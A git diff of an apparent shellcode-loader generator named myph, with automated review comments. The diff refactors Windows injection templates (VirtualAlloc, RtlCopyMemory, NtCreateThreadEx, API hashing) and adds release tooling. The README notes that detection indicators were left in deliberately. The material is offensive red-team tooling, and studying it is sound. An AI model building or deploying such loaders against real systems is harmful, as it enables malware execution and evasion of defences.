diff --git a/.goreleaser.yaml b/.goreleaser.yaml index 9b3ce1c..3aca500 100644 --- a/.goreleaser.yaml +++ b/.goreleaser.yaml @@ -20,6 +20,8 @@ builds: - linux - windows - darwin + goarch: + - amd64 archives: - format: tar.gz diff --git a/Makefile b/Makefile index 5870b63..09d5f30 100644 --- a/Makefile +++ b/Makefile @@ -2,7 +2,7 @@ # ------------------- APP_NAME = myph -APP_VERSION = 1.2.2 +APP_VERSION = 1.2.3 GIT_REVISION = `git rev-parse HEAD` DOCKER_IMAGE_TAG ?= $(APP_VERSION) DOCKER_LOCAL_IMAGE = $(APP_NAME):$(DOCKER_IMAGE_TAG) @@ -56,3 +56,7 @@ clean: ## clean up the project directory .PHONY: docker docker: ## build a local docker image @docker build . -t $(APP_NAME):latest -t $(APP_NAME):$(APP_VERSION) + +.PHONY: release-build +release-build: ## makes a release build locally on the current commit + @goreleaser release --skip=publish --snapshot diff --git a/README.md b/README.md index 823e686..0b4ba93 100644 --- a/README.md +++ b/README.md @@ -12,6 +12,9 @@ for general information and testing. The tool and this repository are carefully However, the developers cannot be held liable for for any damage, direct or indirect, of whatever nature as a result of or related to the access to or use of the software. +> IOCs have voluntarily been added to the project. Don't open any issues regarding detections, it's pointless. +> The goal of this project is to learn & teach. If you want a FUD loader, dont be a baby and make your own. + ## How to use the software ? > Please note this project is under development & subject to changes. diff --git a/cli/parser.go b/cli/parser.go index 113be2a..dfd23f1 100644 --- a/cli/parser.go +++ b/cli/parser.go @@ -71,7 +71,7 @@ func BuildLoader(opts *Options) *exec.Cmd { func GetParser(opts *Options) *cobra.Command { - version := "1.2.2" + version := "1.2.3" var spoofMetadata = &cobra.Command{ Use: "spoof", Version: version, 
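Review bot: The version now lives in two hand-synchronised places, `APP_VERSION = 1.2.3` here and `version := "1.2.3"` in cli/parser.go, and this commit has to bump both by hand; the new `release-build` target already goes through goreleaser, which can inject the version at link time (an ldflags `-X` on a package-level variable) so the CLI banner and the archive names cannot disagree. Until that is done, a comment beside the constant, `# keep in sync with the version string in cli/parser.go`, at least marks the coupling for the next bump.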
@@ -143,6 +143,32 @@ func GetParser(opts *Options) *cobra.Command { os.Exit(1) } + if opts.UseAPIHashing { + fmt.Printf("[+] Retrieving dependencies to use API Hashing...\n") + + execGoGetCmd := exec.Command("go", "get", "github.com/Binject/debug/pe") + execGoGetCmd.Dir = MYPH_TMP_DIR + _, _ = execGoGetCmd.Output() + + if opts.WithDebug { + // if running debug, we want to have the local internals because + // it makes development easier + + fmt.Printf("[+] Running \"cp -r ./internals /tmp/myph-out\"\n") + + execGoGetCmd = exec.Command("cp", "-r", "./internals", MYPH_TMP_DIR) + execGoGetCmd.Dir = "." + _, _ = execGoGetCmd.Output() + + } else { + // this should stay to cmepw addr + execGoGetCmd = exec.Command("go", "get", "github.com/cmepw/myph/internals") + execGoGetCmd.Dir = MYPH_TMP_DIR + _, _ = execGoGetCmd.Output() + } + + } + /* reading the shellcode as a series of bytes */ shellcode, err := tools.ReadFile(opts.ShellcodePath) if err != nil { @@ -274,12 +300,6 @@ func GetParser(opts *Options) *cobra.Command { fmt.Printf("\n[+] Template (%s) written to tmp directory. Compiling...\n", opts.Technique) - if opts.UseAPIHashing { - execGoGetCmd := exec.Command("go", "get", "github.com/Binject/debug/pe") - execGoGetCmd.Dir = MYPH_TMP_DIR - _, _ = execGoGetCmd.Output() - } - execCmd := BuildLoader(opts) execCmd.Dir = MYPH_TMP_DIR diff --git a/loaders/createThread.go b/loaders/createThread.go index d5333bc..10669e1 100644 --- a/loaders/createThread.go +++ b/loaders/createThread.go @@ -35,24 +35,15 @@ import ( } func (t CreateTTemplate) Const() string { - return fmt.Sprintf(` + if !t.UseApiHashing { + + return fmt.Sprintf(` const ( MEM_COMMIT = 0x1000 MEM_RESERVE = 0x2000 PAGE_EXECUTE_READWRITE = 0x40 ) - -`) -} - -func (t CreateTTemplate) Init() string { - - if t.UseApiHashing { - return fmt.Sprintf("\n") - } - - return fmt.Sprintf(` var ( kernel32 = syscall.MustLoadDLL("kernel32.dll") ntdll = syscall.MustLoadDLL("ntdll.dll") 
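Review bot: Every `go get` in the new `if opts.UseAPIHashing` branch discards its result (`_, _ = execGoGetCmd.Output()`), so an offline build, a blocked GOPROXY or a removed module is only noticed later when the loader fails to compile with an unrelated error; capture the output, check `err` and abort at that point. The modules are also fetched unpinned, so the generated loader links whatever version of `github.com/Binject/debug/pe` and `github.com/cmepw/myph/internals` resolves at build time — pin a version or commit in the `go get` argument and run `go mod verify` in `MYPH_TMP_DIR` so builds are reproducible and an upstream change cannot silently alter the emitted binary. The debug path shells out to `cp -r` with `Dir = "."`, which assumes the command runs from the repository root on a host that has `cp`, and its progress message hard-codes `/tmp/myph-out` while the real destination is `MYPH_TMP_DIR`; print the variable (or copy with `os`/`io`) so the two cannot drift. GetParser's body continues on both sides of this hunk.
```go
execGoGetCmd := exec.Command("go", "get", "github.com/Binject/debug/pe")
execGoGetCmd.Dir = MYPH_TMP_DIR
if out, err := execGoGetCmd.CombinedOutput(); err != nil {
	fmt.Printf("[!] go get github.com/Binject/debug/pe failed: %v\n%s\n", err, out)
	os.Exit(1)
}
// … unchanged: WithDebug branch and the internals `go get` — give each command the same check …
```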
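Review bot: The `const (` block is now emitted verbatim in both branches of `Const()` and each copy is wrapped in a `fmt.Sprintf` that has no format verbs, so a later edit to one copy (for example changing `PAGE_EXECUTE_READWRITE`) silently diverges from the other; hoist the block into a single string and return it alone or concatenated with the `var (` block. `fmt.Sprintf` on a verb-free literal is what staticcheck reports as S1039 and reads better as a plain string literal. Const's closing brace lies outside this hunk.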
@@ -63,7 +54,23 @@ var ( RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") ) - `) + `) + + } + + return fmt.Sprintf(` +const ( + MEM_COMMIT = 0x1000 + MEM_RESERVE = 0x2000 + PAGE_EXECUTE_READWRITE = 0x40 +) + + +`) +} + +func (t CreateTTemplate) Init() string { + return fmt.Sprintf("\n") } func (t CreateTTemplate) Process() string { diff --git a/loaders/ntCreateThreadEx.go b/loaders/ntCreateThreadEx.go index 6cc2802..7c95a91 100644 --- a/loaders/ntCreateThreadEx.go +++ b/loaders/ntCreateThreadEx.go @@ -29,6 +29,8 @@ import ( return fmt.Sprintf(` import ( + "fmt" + "log" "syscall" "unsafe" ) 
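Review bot: The `"fmt"` and `"log"` imports are added unconditionally to the generated loader's import block, but whether both template variants (API hashing on and off) actually reference them is decided in `Process()`, which is outside this hunk; Go rejects unused imports, so a variant that does not call both packages fails to compile after generation rather than in this repository's own build. Either emit the two imports only from the branch that uses them, or leave a comment on the block, `// fmt and log are used by the error paths emitted in Process()`, so the next reader knows why a loader template pulls in logging. The enclosing `Imports()` function starts before this hunk.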
@@ -38,30 +40,40 @@ import ( func (t NtCreateThreadExTemplate) Const() string { // same consts with or without API Hashing - return fmt.Sprintf(` -const ( - MEM_COMMIT = 0x1000 - MEM_RESERVE = 0x2000 - PAGE_EXECUTE_READ = 0x20 - PAGE_READWRITE = 0x04 -) -`) -} - -func (t NtCreateThreadExTemplate) Init() string { - if t.UseApiHashing { - return fmt.Sprintf("\n") + return fmt.Sprintf(` + const ( + MEM_COMMIT = 0x1000 + MEM_RESERVE = 0x2000 + PAGE_EXECUTE_READ = 0x20 + PAGE_READWRITE = 0x04 + ) + `) } return fmt.Sprintf(` - ntdll := syscall.MustLoadDLL("ntdll.dll") + const ( + MEM_COMMIT = 0x1000 + MEM_RESERVE = 0x2000 + PAGE_EXECUTE_READ = 0x20 + PAGE_READWRITE = 0x04 + ) + + var ( - NtAllocateVirtualMemory = ntdll.MustFindProd("NtAllocateVirtualMemory") - NtWriteVirtualMemory = ntdll.MustFindProd("NtWriteVirtualMemory") - NtProtectVirtualMemory = ntdll.MustFindProd("NtProtectVirtualMemory") - NtCreateThreadEx = ntdll.MustFindProd("NtCreateThreadEx") + ntdll = syscall.MustLoadDLL("ntdll.dll") + + NtAllocateVirtualMemory = ntdll.MustFindProc("NtAllocateVirtualMemory") + NtWriteVirtualMemory = ntdll.MustFindProc("NtWriteVirtualMemory") + NtProtectVirtualMemory = ntdll.MustFindProc("NtProtectVirtualMemory") + NtCreateThreadEx = ntdll.MustFindProc("NtCreateThreadEx") + ) `) + +} + +func (t NtCreateThreadExTemplate) Init() string { + return fmt.Sprintf("\n") } func (t NtCreateThreadExTemplate) Process() string { diff --git a/loaders/syscall.go b/loaders/syscall.go index 78d168c..d989f17 100644 --- a/loaders/syscall.go +++ b/loaders/syscall.go @@ -36,9 +36,9 @@ import ( } func (t SysTemplate) Const() string { - // same consts with or without API Hashing - return fmt.Sprintf(` + if t.UseApiHashing { + return fmt.Sprintf(` const ( MEM_COMMIT = 0x1000 MEM_RESERVE = 0x2000 
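Review bot: The comment `// same consts with or without API Hashing` now heads a function whose two branches differ, and the `const (` block it describes is duplicated inside two verb-free `fmt.Sprintf` calls; factor the block into one shared string so the comment stays true and a change to one copy cannot diverge from the other. The non-hashing branch also moves `ntdll` and the four `MustFindProc` lookups out of `Init()` into a `var (` block in `Const()`, presumably file scope in the assembled loader, so they now resolve during package initialization of the emitted binary and `MustFindProc` panics there if an export is missing; a one-line comment recording that intent would help. `Process()` follows outside the hunk.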
@@ -46,24 +46,33 @@ const ( PAGE_READWRITE = 0x04 ) `) -} - -func (t SysTemplate) Init() string { - if t.UseApiHashing { - return fmt.Sprintf("\n") } return fmt.Sprintf(` - kernel32 := syscall.MustLoadDLL("kernel32.dll") - ntdll := syscall.MustLoadDLL("ntdll.dll") +const ( + MEM_COMMIT = 0x1000 + MEM_RESERVE = 0x2000 + PAGE_EXECUTE_READ = 0x20 + PAGE_READWRITE = 0x04 +) + +var ( + kernel32 = syscall.MustLoadDLL("kernel32.dll") + ntdll = syscall.MustLoadDLL("ntdll.dll") + + VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") + VirtualProtect = kernel32.MustFindProc("VirtualProtect") + RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory") +) - VirtualAlloc := kernel32.MustFindProc("VirtualAlloc") - VirtualProtect := kernel32.MustFindProc("VirtualProtect") - RtlCopyMemory := ntdll.MustFindProc("RtlCopyMemory") `) } +func (t SysTemplate) Init() string { + return fmt.Sprintf("\n") +} + func (t SysTemplate) Process() string { if t.UseApiHashing { return fmt.Sprintf(` diff --git a/loaders/utils.go b/loaders/utils.go index 1167b53..02cc105 100644 --- a/loaders/utils.go +++ b/loaders/utils.go @@ -3,7 +3,7 @@ package loaders func InformExpermimental() { println("[!] The API hashing feature is still in an an experimental stage!!") println("Only a few methods are supported for now:") - println("\t-Syscall\n\t-CreateThread\n\t-tNtCreateThreadEx\n") + println("\t-Syscall\n\t-CreateThread\n\t-NtCreateThreadEx\n") } func InformProcessUnused(process string) { diff --git a/utils/utils b/utils/utils deleted file mode 100755 index bd12637..0000000 Binary files a/utils/utils and /dev/null differ
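Review bot: `syscall.MustLoadDLL("kernel32.dll")` and `syscall.MustLoadDLL("ntdll.dll")` in the new `var (` block load by bare name, and the `syscall` package documents `LoadDLL` without an absolute path as subject to DLL preloading, pointing to `golang.org/x/sys/windows` lazy system-DLL loading instead. For kernel32 and ntdll this is largely moot, since both are mapped into every process before user code runs, but that reasoning belongs in the template: `// kernel32/ntdll are already mapped at process start, so bare-name loading cannot be hijacked here`. The same `const (` block is emitted in both branches of `Const()`; one shared string would remove the duplication. The function begins before this hunk.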